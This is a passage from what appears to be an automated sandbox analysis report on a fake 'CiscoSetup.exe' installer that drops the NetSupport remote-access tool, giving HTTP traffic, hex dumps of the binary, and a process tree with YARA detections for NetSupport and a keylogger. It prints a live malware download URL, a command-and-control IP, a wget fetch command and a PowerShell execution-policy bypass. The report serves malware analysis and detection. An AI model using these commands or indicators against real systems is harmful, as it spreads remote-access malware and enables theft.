                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kNB%2FAExhSlq1S3EhxqVyZQLGNmIkGufrHWMc7vdkEz2HH7nAqmnXOKeO8SCnShUCFJCdz4y8I6sIBq4qj616J5i7R4tad4G%2FSv%2FuJfXUNyGkBLb9QMGL%2FsHqD11jFIV893HUy8B3HoLa73MK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a
                                                                                                                                                                                                  Data Ascii: 1040.7357,-74.1724
                                                                                                                                                                                                  Oct 31, 2024 18:05:58.008858919 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  2192.168.11.2049758199.188.200.1954434288C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.784583092 CET222OUTPOST http://199.188.200.195/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 199.188.200.195Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                                                                                                  Data Raw:
                                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  0192.168.11.204975554.37.62.774434116C:\Windows\SysWOW64\wget.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2024-10-31 17:05:21 UTC262OUTGET /wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe HTTP/1.1
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                  Host: asknetsupertech.com
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  2024-10-31 17:05:21 UTC406INHTTP/1.1 200 OK
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  content-type: application/x-msdownload
                                                                                                                                                                                                  last-modified: Fri, 25 Oct 2024 09:25:22 GMT
                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                  content-length: 16877888
                                                                                                                                                                                                  date: Thu, 31 Oct 2024 17:05:21 GMT
                                                                                                                                                                                                  server: LiteSpeed
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                  2024-10-31 17:05:21 UTC16384INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                  2024-10-31 17:05:21 UTC16384INData Raw: 02 00 00 00 08 4c 40 00 11 13 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 43 68 61 72 3e 02 00 00 00 00 00 00 00 ff ff ff ff 4c 10 40 00 06 53 79 73 74 65 6d 4c 10 40 00 02 00 00 00 40 4c 40 00 11 13 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 57 6f 72 64 3e 02 00 00 00 00 00 00 00 12 00 00 00 cc 10 40 00 06 53 79 73 74 65 6d cc 10 40 00 02 00 00 00 78 4c 40 00 11 17 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 53 68 6f 72 74 49 6e 74 3e 01 00 00 00 00 00 00 00 10 00 00 00 64 10 40 00 06 53 79 73 74 65 6d 64 10 40 00 02 00 00 00 b4 4c 40 00 11 17 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 53 6d 61 6c 6c 49 6e 74 3e 02 00 00 00 00 00 00 00 02 00 00 00 80 10 40 00 06 53 79 73 74 65 6d 80 10 40 00 02 00 00 00 f0 4c 40 00 11 16 54 41 72 72 61 79 3c 53 79 73 74 65 6d
                                                                                                                                                                                                  Data Ascii: L@TArray<System.Char>L@SystemL@@L@TArray<System.Word>@System@xL@TArray<System.ShortInt>d@Systemd@L@TArray<System.SmallInt>@System@L@TArray<System
                                                                                                                                                                                                  2024-10-31 17:05:21 UTC16384INData Raw: c6 e8 76 fe ff ff 8b 45 f4 89 43 04 33 c0 5a 59 59 64 89 10 68 2f 8c 40 00 8b 1d f8 d8 4a 00 8b 45 f0 ff 53 0c 58 ff e0 e9 27 04 00 00 eb ea 0f b6 45 fb 5f 5e 5b 8b e5 5d c3 8b c0 53 56 8b f2 8b d8 83 3d f8 d8 4a 00 00 75 07 b0 1a e8 52 e4 ff ff 8b c3 e8 c7 fc ff ff 8b d0 8b ce 92 e8 21 ff ff ff 5e 5b c3 8b c0 53 56 57 8b f9 8b f2 8b d8 83 3d f8 d8 4a 00 00 75 07 b0 1a e8 23 e4 ff ff 8b c6 e8 98 fc ff ff 50 8b c3 e8 90 fc ff ff 8b cf 5a e8 ec fe ff ff 5f 5e 5b c3 80 3d 34 90 4a 00 01 76 11 6a 00 6a 00 6a 00 68 df fa ed 0e ff 15 1c d0 4a 00 c3 90 80 3d 34 90 4a 00 00 74 17 50 50 52 54 6a 02 6a 00 68 e4 fa ed 0e ff 15 1c d0 4a 00 83 c4 08 58 c3 8d 40 00 54 6a 01 6a 00 68 e0 fa ed 0e ff 15 1c d0 4a 00 83 c4 04 58 c3 8d 40 00 80 3d 34 90 4a 00 01 76 09 50 ff
                                                                                                                                                                                                  Data Ascii: vEC3ZYYdh/@JESX'E_^[]SV=JuR!^[SVW=Ju#PZ_^[=4JvjjjhJ=4JtPPRTjjhJX@TjjhJX@=4JvP
                                                                                                                                                                                                  2024-10-31 17:05:21 UTC16384INData Raw: 4a 00 85 db 74 1f 3b 73 04 74 0a 3b 73 08 74 05 3b 73 0c 75 0a 8b c3 e8 94 ff ff ff 5e 5b c3 8b 1b 85 db 75 e1 8b c6 5e 5b c3 00 00 7a 68 2d 54 57 2c 7a 68 2d 48 61 6e 74 2c 7a 68 00 00 00 00 65 73 2d 45 53 5f 74 72 61 64 6e 6c 00 00 00 00 6e 62 2d 4e 4f 2c 6e 62 2c 6e 6f 00 74 67 2d 43 79 72 6c 2d 54 4a 00 00 61 7a 2d 4c 61 74 6e 2d 41 5a 00 00 75 7a 2d 4c 61 74 6e 2d 55 5a 00 00 6d 6e 2d 4d 4e 2c 6d 6e 2d 43 79 72 6c 2c 6d 6e 00 00 00 00 69 75 2d 43 61 6e 73 2d 43 41 00 00 68 61 2d 4c 61 74 6e 2d 4e 47 00 00 71 70 73 2d 70 6c 6f 63 2c 65 6e 00 71 70 73 2d 70 6c 6f 63 61 2c 6a 61 00 00 00 00 7a 68 2d 43 4e 2c 7a 68 2d 48 61 6e 73 2c 7a 68 00 00 00 00 6e 6e 2d 4e 4f 2c 6e 6e 2c 6e 6f 00 73 72 2d 4c 61 74 6e 2d 43 53 00 00 61 7a 2d 43 79 72 6c 2d 41 5a 00
                                                                                                                                                                                                  Data Ascii: Jt;st;st;su^[u^[zh-TW,zh-Hant,zhes-ES_tradnlnb-NO,nb,notg-Cyrl-TJaz-Latn-AZuz-Latn-UZmn-MN,mn-Cyrl,mniu-Cans-CAha-Latn-NGqps-ploc,enqps-ploca,jazh-CN,zh-Hans,zhnn-NO,nn,nosr-Latn-CSaz-Cyrl-AZ
                                                                                                                                                                                                  2024-10-31 17:05:21 UTC16384INData Raw: 4b 00 8b c0 ff 25 20 55 4b 00 8b c0 ff 25 04 55 4b 00 8b c0 ff 25 0c 55 4b 00 8b c0 ff 25 fc 54 4b 00 8b c0 ff 25 28 55 4b 00 8b c0 ff 25 08 55 4b 00 8b c0 ff 25 1c 55 4b 00 8b c0 ff 25 dc 52 4b 00 8b c0 ff 25 3c 53 4b 00 8b c0 ff 25 3c 53 4b 00 8b c0 68 40 60 4b 00 e8 ce ea ff ff 59 5a 87 04 24 c3 ff 25 54 54 4b 00 8b c0 ff 25 6c 54 4b 00 8b c0 ff 25 18 54 4b 00 8b c0 ff 25 24 53 4b 00 8b c0 ff 25 3c 54 4b 00 8b c0 ff 25 24 54 4b 00 8b c0 ff 25 84 53 4b 00 8b c0 ff 25 5c 54 4b 00 8b c0 ff 25 34 53 4b 00 8b c0 ff 25 58 53 4b 00 8b c0 ff 25 18 53 4b 00 8b c0 ff 25 d4 52 4b 00 8b c0 ff 25 0c 53 4b 00 8b c0 ff 25 04 53 4b 00 8b c0 ff 25 bc 53 4b 00 8b c0 ff 25 b4 53 4b 00 8b c0 ff 25 64 53 4b 00 8b c0 ff 25 70 53 4b 00 8b c0 ff 25 44 54 4b 00 8b c0 ff 25 e8
                                                                                                                                                                                                  Data Ascii: K% UK%UK%UK%TK%(UK%UK%UK%RK%<SK%<SKh@`KYZ$%TTK%lTK%TK%$SK%<TK%$TK%SK%\TK%4SK%XSK%SK%RK%SK%SK%SK%SK%dSK%pSK%DTK%
                                                                                                                                                                                                  2024-10-31 17:05:22 UTC16384INData Raw: 02 02 02 02 02 02 02 02 02 02 02 07 07 07 07 07 07 07 07 07 07 02 0c 0c 11 02 02 0c 0f 0f 0f 0f 15 15 15 15 15 02 02 02 02 02 02 07 07 0c 0c 0c 0c 15 15 15 15 02 02 02 02 02 02 07 07 07 07 07 0f 0f 0f 0f 0f 0f 0f 02 02 02 02 07 07 07 07 07 07 07 0c 0c 0c 0c 0c 0a 0c 0c 0c 0c 0c 0c 0a 0c 0c 0a 0a 0c 0c 07 0a 07 07 07 07 07 07 07 07 07 07 07 07 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 07 07 07 07 07 07 15 15 15 07 15 07 07 0c 0c 15 15 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 15 15 15 15 07 07 0c 0a 0a 0c 0c 0a 0a 0a 0a 0a 0a 0c 07 0a 0c 0c 0c 0c 02 0a 0a 0a 02 0a 0a 0a 0c 07 1a 1a 1a 15 15 15 15 15 15 15 15 15 15 15 15 11 11 15 15 15 15 15 15 15 11 15 15 11 15 14 13 15 15 19 11 19 19 19 02 15 17 15 15 02 02 02 02 07 07 07 0c 15 15 07 02 02 02 02 02 02 02 02 02 0a 07 07 07 07 15
                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                  2024-10-31 17:05:22 UTC16384INData Raw: 00 00 0f 53 79 73 74 65 6d 2e 53 79 73 55 74 69 6c 73 00 00 00 00 02 00 00 00 00 00 74 8c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 94 8c 41 00 00 00 00 00 7c 8c 41 00 00 00 00 00 82 8c 41 00 20 00 00 00 d0 8a 41 00 f8 7e 40 00 00 7f 40 00 04 2f 42 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 34 2e 42 00 ac 2e 42 00 78 2e 42 00 00 00 00 00 02 00 0b 45 52 61 6e 67 65 45 72 72 6f 72 00 00 94 8c 41 00 07 0b 45 52 61 6e 67 65 45 72 72 6f 72 74 8c 41 00 40 8b 41 00 00 00 0f 53 79 73 74 65 6d 2e 53 79 73 55 74 69 6c 73 00 00 00 00 02 00 00 00 00 1c 8d 41 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 8d 41 00 00 00 00 00 24 8d 41 00 00 00 00 00 2a 8d 41 00 20 00 00 00 d0 8a 41 00 f8 7e 40 00 00 7f 40 00 04 2f 42 00 e8 80 40
                                                                                                                                                                                                  Data Ascii: System.SysUtilstAA|AA A~@@/B@@@@@}@}@4.B.Bx.BERangeErrorAERangeErrortA@ASystem.SysUtilsA<A$A*A A~@@/B@
                                                                                                                                                                                                  2024-10-31 17:05:22 UTC16384INData Raw: 89 02 80 eb 08 8b 75 f0 80 fb 01 76 28 8b fe 8b c6 e8 8e fc ff ff 8b f0 6b c6 64 2b f8 80 eb 02 0f b6 c3 8b 55 e4 8b 0c bd de ab 4a 00 89 0c 42 80 fb 01 77 d8 84 db 74 0a 66 83 ce 30 8b 45 e4 66 89 30 5f 5e 5b 8b e5 5d c2 08 00 53 56 8b f2 8b d8 8b c3 99 33 c2 2b c2 85 db 0f 9c c2 8b ce e8 4f fc ff ff 5e 5b c3 55 8b ec 53 8b d8 8b 45 08 8b 55 0c 85 d2 7d 07 f7 d8 83 d2 00 f7 da 52 50 83 7d 0c 00 75 09 83 7d 08 00 0f 92 c0 eb 03 0f 9c c0 8b d3 e8 ea fc ff ff 5b 5d c2 08 00 90 53 56 8b f2 8b d8 8b ce 33 d2 8b c3 e8 03 fc ff ff 5e 5b c3 55 8b ec 53 8b d8 ff 75 0c ff 75 08 8b d3 33 c0 e8 bb fc ff ff 5b 5d c2 08 00 8b c0 55 8b ec 53 56 57 8b d9 8b fa 8b f0 3b df 7e 02 8b fb 8b 45 08 8b d7 e8 1c d9 fe ff 8b 45 08 8b 00 8b d7 2b d3 85 d2 7e 0d 0f b7 4d 0c 66 89
                                                                                                                                                                                                  Data Ascii: uv(kd+UJBwtf0Ef0_^[]SV3+O^[USEU}RP}u}[]SV3^[USuu3[]USVW;~EE+~Mf
                                                                                                                                                                                                  2024-10-31 17:05:22 UTC16384INData Raw: b7 4b 02 8b 55 e8 8b 45 ec e8 12 f9 ff ff 84 c0 75 07 33 db e9 e2 00 00 00 4e 75 e3 eb 07 33 db e9 d6 00 00 00 47 83 c3 04 83 ff 41 0f 85 d6 fb ff ff f6 45 d7 08 75 0b e8 2b e4 ff ff 66 89 45 e2 eb 6c 83 7d fc 00 7e 11 55 0f b7 45 e2 e8 e9 fa ff ff 59 66 89 45 e2 eb 55 0f b6 45 d7 22 05 2c 0d 42 00 0f b6 15 2c 0d 42 00 3a d0 75 40 e8 f4 e3 ff ff 0f b7 c8 8b 45 08 0f b7 80 c4 00 00 00 2b c8 8b c1 bb 64 00 00 00 99 f7 fb 66 6b c0 64 66 01 45 e2 8b 45 08 66 83 b8 c4 00 00 00 00 76 0d 0f b7 45 e2 3b c8 7e 05 66 83 45 e2 64 f6 45 d7 01 75 06 66 c7 45 de 01 00 f6 45 d7 04 75 04 33 db eb 36 8b 45 e4 50 0f b7 4d de 0f b7 55 e0 0f b7 45 e2 e8 b2 e0 ff ff 8b d8 84 db 74 1b f6 45 d7 02 74 15 8b 45 e4 ff 70 04 ff 30 e8 fd e2 ff ff 66 3b 45 dc 74 02 33 db 33 c0 5a 59
                                                                                                                                                                                                  Data Ascii: KUEu3Nu3GAEu+fEl}~UEYfEUE",B,B:u@E+dfkdfEEfvE;~fEdEufEEu36EPMUEtEtEp0f;Et33ZY
                                                                                                                                                                                                  2024-10-31 17:05:22 UTC16384INData Raw: 14 8b 75 18 80 7d 0c 00 74 19 56 57 8b 5d 10 53 0f b7 1d 44 4c 42 00 53 8b 5d 08 53 e8 8b 00 00 00 eb 17 56 57 8b 5d 10 53 0f b7 1d 48 4c 42 00 53 8b 5d 08 53 e8 72 00 00 00 5f 5e 5b 5d c2 14 00 00 00 00 04 00 00 00 00 00 00 00 53 56 57 51 66 89 04 24 33 ff 33 db be c4 b2 4a 00 8b c3 3c 0f 77 08 83 e0 7f 66 0f a3 04 24 73 2e 84 db 75 10 33 d2 b8 06 00 00 00 e8 93 17 00 00 84 c0 74 1a 80 fb 08 75 13 ba 01 00 00 00 b8 06 00 00 00 e8 7b 17 00 00 84 c0 74 02 0b 3e 43 83 c6 04 80 fb 0a 75 b9 8b c7 5a 5f 5e 5b c3 90 55 8b ec 83 c4 f8 53 56 89 4d f8 8b f2 89 45 fc 8b 55 fc 8b c2 85 c0 74 05 83 e8 04 8b 00 85 c0 75 04 b0 01 eb 11 8b 45 f8 85 c0 74 05 83 e8 04 8b 00 85 c0 0f 94 c0 84 c0 74 2f 8b c2 85 c0 74 05 83 e8 04 8b 00 85 c0 7e 07 b8 01 00 00 00 eb 4a 8b 45
                                                                                                                                                                                                  Data Ascii: u}tVW]SDLBS]SVW]SHLBS]Sr_^[]SVWQf$33J<wf$s.u3tu{t>CuZ_^[USVMEUtuEtt/t~JE


                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                  Start time:13:05:19
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1
                                                                                                                                                                                                  Imagebase:0xd60000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                  Start time:13:05:19
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff79c270000
                                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                  Start time:13:05:19
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\wget.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:3'895'184 bytes
                                                                                                                                                                                                  MD5 hash:3DADB6E2ECE9C4B3E1E322E617658B60
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                  Start time:13:05:28
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\download\CiscoSetup.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\download\CiscoSetup.exe"
                                                                                                                                                                                                  Imagebase:0xa90000
                                                                                                                                                                                                  File size:16'877'888 bytes
                                                                                                                                                                                                  MD5 hash:91F7229586DF2C577A54AD0D1A5BDCB1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                  Start time:13:05:29
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe"
                                                                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                                                                  File size:3'548'672 bytes
                                                                                                                                                                                                  MD5 hash:BFD84005E52425F9B8FE658B9663E1C4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                  Start time:13:05:53
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1"
                                                                                                                                                                                                  Imagebase:0x7ff61bb30000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.69180702830.0000000009FC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                  Start time:13:05:53
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff79c270000
                                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                  Start time:13:05:56
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70082150611.00000000027FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.69135758155.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70080906135.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70082720696.0000000003250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                  Start time:13:06:07
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000C.00000000.69246854158.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000C.00000002.69248279133.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                  Start time:13:06:15
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
